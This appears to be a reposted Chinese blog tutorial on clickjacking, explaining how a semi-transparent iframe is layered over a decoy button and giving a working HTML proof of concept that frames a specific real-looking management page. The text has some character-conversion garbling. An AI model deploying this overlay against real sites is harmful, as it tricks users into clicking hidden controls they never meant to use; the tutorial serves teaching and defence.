点击劫持

时间 2020-05-23

标签点击劫持繁體版

原文原文链接

什么是点击劫持：html

是一种视觉上的欺骗，攻击者使用一个透明的，不可见的iframe标签，覆盖在一个网页上，诱使用户在该网页上进行操做，用户在不知情的状况下点击透明的iframe页面经过调整iframe页面的位置能够诱使用户刚好点击在iframe页面的的一些功能性按钮上ui

 
  <!DOCTYPE html> 
 
  <html lang="en"> 
 
  <head> 
 
      <meta charset="UTF-8"> 
 
      <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
 
      <meta http-equiv="X-UA-Compatible" content="ie=edge"> 
 
      <title>click jack</title> 
 
      <style> 
 
      iframe{ 
 
          width:900px; 
 
          height: 250px; 
 
          top: -195px; 
 
          left:-740px; 
 
          z-index: 2; 
 
          -moz-opacity:0.5; 
 
          opacity: 0.5; 
 
          filter:alpha(opacity=0.5); 
 
      } 
 
      button { 
 
          position: absolute; 
 
          top: 10px; 
 
          left: 10px; 
 
          width: 120px; 
 
          z-index:1; 
 
      } 
 
      </style> 
 
  </head> 
 
  <body> 
 
      <iframe src="http://search.esgcc.com.cn/managerGf/toGfIndexPage" scrolling="no"></iframe> 
 
      <button>CLICK jack</button> 
 
  </body> 
 
  </html> 
 
  经过控制iframe的长宽，调整top，left的位置，能够把iframe页面内任意部分覆盖到任何地方。 
 
  同时设置iframe的position位absolute并将z-index的设置为最大已达到让iframe在页面最上层。 
 
  最后，经过设置opacity来控制iframe页面的透明度，值为0是彻底不可见

1. 防范点击劫持
2. web安全-点击劫持
3. 点击劫持漏洞
4. 点击劫持小例
5. 前端点击劫持
6. 11、点击劫持漏洞
7. Session劫持攻击
8. 点击劫持技术原理简述
9. Web安全之点击劫持（ClickJacking）
10. Web渗透（四）点击劫持
更多相关文章...
• R 绘图 - 中文支持 - R 语言教程
• ASP.NET Web Forms - 维持 ViewState - ASP.NET 教程
• 使用阿里云OSS+CDN部署前端页面与加速静态资源
• IntelliJ IDEA安装代码格式化插件